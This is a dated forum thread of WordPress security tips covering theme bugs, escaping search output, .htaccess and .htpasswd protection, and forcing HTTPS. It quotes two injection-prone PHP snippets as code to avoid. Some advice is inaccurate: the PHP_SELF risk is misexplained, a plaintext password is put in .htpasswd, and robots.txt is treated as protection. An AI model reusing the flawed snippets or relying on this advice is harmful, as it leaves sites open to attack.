Languages

---

About This Topic

• Posted 4 years ago
• By milo
• Latest reply from milo
• This topic is sticky
• This topic is closed

• Related Topics:

  • Enterprise theme widgets
  • WordPress Tips
  • Nature theme and theme tester and theme page
  • More WordPress Tips
  • redfractal theme

Tags

• security
• safe
• wordpress

1. 

   milo
   

   moderator
   

   
   Posted 4 years ago
   #

   DO NOT use the default Kubrick theme, as it contains a security bug:
   Affected Script: /themes.php?page=functions.php
   “Header Image and Color” section of the Default Theme Kubrick.
   Further info: here.
2. 

   milo
   

   moderator
   

   
   Posted 4 years ago
   #

   DO NOT use this search code in the search php:
   < ? php echo $ _ SERVER [ ' PHP _ SELF ' ] ; ? >
   Nobody should be allowed to search your entire server, or?
   Use this one instead:
   < ? php bloginfo ( ' home ' ) ; ? > /
3. 

   milo
   

   moderator
   

   
   Posted 4 years ago
   #

   Another bad code used in title tags or search templates:
   ? php echo $ s ; }
   as it allows malicious code injection.
   Use this one:
   ? php echo wp _ specialchars ( $ s , 1 ) ; }
4. 

   milo
   

   moderator
   

   
   Posted 3 years ago
   #

   Strongly recommended:

   • Login LockDown
     A WordPress Enhanced Login Security Plugin
   • Security
     Check these plugins, suggest disabling the plugin until a fix has been produced.
   • WordPress Security, PDF
     How to Secure WordPress whitepaper

   Additional tips:
   Tip 1 :

   Remove Wordpress ‘version string’ in your theme files
   Go to Wordpress dashboard, click on presentation -> edit themes -> header.php
   Find and remove this. bloginfo('version') Save the file.

   Tip 2 :

   Place empty ‘index.html’ file in the plugins folder
   Open Notepad. Click ’save as’ and save the file as index.html (be sure to change the filetype from text files to all files)
   Upload the file to the WordPress plugins folder at your web server.

   Tip 3:

   Upload a copy of .htaccess file in the wp-admin folder
   Using FTP program or your webserver file manager, go to the root folder of your server and download .htaccess file (set ’show hidden files’ first if you’re using FTP program such as FileZilla)
   Go to your wp-admin folder
   Upload the .htaccess file you’ve downloaded just now.

   Tip 4:

   You can also disallow users pretending to be search engine/ search engines from crawling the core Wordpress folders by putting these in your robot.txt file (upload the file to root of your Wordpress installation folder when you’ve finished).

   # This rule means it applies to all user-agents
   User-agent: *

   # Disallow all directories and files within
   Disallow: /wp-admin/
   Disallow: /wp-includes/

   Tip 5:

   Password protect the wp-admin directory:
   Create a file within your wp-admin directory named “.htaccess” if there isn’t already one.
   Create a file ABOVE YOUR PUBLIC_HTML directory named “.htpasswd”. Make sure you put this outside the web accessible directory or someone could read your password! Usually this is where you go when you first login to your ftp programm.
   Append the following contents to the “.htpasswd” file where xxxx = your username and yyyy = your password:
   xxxx:yyyy

   Tip 6:

   Append the following to your “.htaccess” file inside of your wp-admin directory. Make sure you use the absolute path to the “.htaccess” file. If you don’t know, ask your ISP. xxxx = the username that you entered in your “.htpasswd” directory:
   AuthUserFile /home/username/.htpasswd
   AuthGroupFile /dev/null
   AuthName EnterPassword
   AuthType Basic

   require user xxxx

   Tip 7:

   Restrict access to the wp-content and wp-includes directories:
   Create a file within your wp-content and wp-includes directory named “.htaccess” if there isn’t already one.
   Append the following to the “.htaccess” file. NOTE: you may have trouble with some plugins with this method:
   Order Allow,Deny
   Deny from all
   <Files ~ “.(css|jpe?g|png|gif|js)$”>
   Allow from all
   </Files>

   Important Note: Please ensure that your WordPress files and database are backed up before attempting any of these changes.
5. 

   milo
   

   moderator
   

   
   Posted 3 years ago
   #

   Force SSL (https://) on an entire website while not force-SSL PHP code on every page, through the .htaccess file :

   RewriteEngine On
   RewriteCond %{SERVER_PORT} 80
   RewriteRule ^(.*)$ https://domain.com/$1 [R,L]

   change “domain.com” to your domain, this way your entire website
   is safe and secure, what is good for shops etc.
6. 

   milo
   

   moderator
   

   
   Posted 3 years ago
   #

   Force A Secure Page Using PHP

   //force redirect to secure page
   if($_SERVER['SERVER_PORT'] != '443') { header('Location: https://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); exit(); }

   the code forces the script to run on secure port 443 as opposed to port 80.